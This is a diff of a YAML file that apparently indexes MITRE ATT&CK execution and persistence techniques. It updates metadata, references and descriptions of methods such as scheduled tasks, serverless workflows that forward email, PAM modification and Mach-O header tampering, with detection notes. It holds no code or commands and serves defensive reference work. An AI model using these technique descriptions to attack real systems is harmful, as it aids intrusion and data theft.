         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26700,12 +27073,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26762,11 +27134,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26831,14 +27202,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26859,14 +27229,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26875,16 +27250,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26910,6 +27287,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26924,29 +27309,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -26959,25 +27325,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -27027,17 +27409,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -27100,7 +27481,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -27134,8 +27515,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -27144,6 +27525,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27156,29 +27541,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27225,7 +27610,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27257,8 +27642,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27272,6 +27657,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27284,16 +27673,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27356,7 +27748,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27421,49 +27812,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27478,20 +27830,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27581,7 +27970,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27669,7 +28057,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27754,11 +28141,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27836,7 +28222,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27869,7 +28254,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27892,11 +28277,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27954,9 +28338,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -28037,12 +28420,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28061,7 +28443,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -28075,7 +28456,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -28102,8 +28482,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28134,7 +28514,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
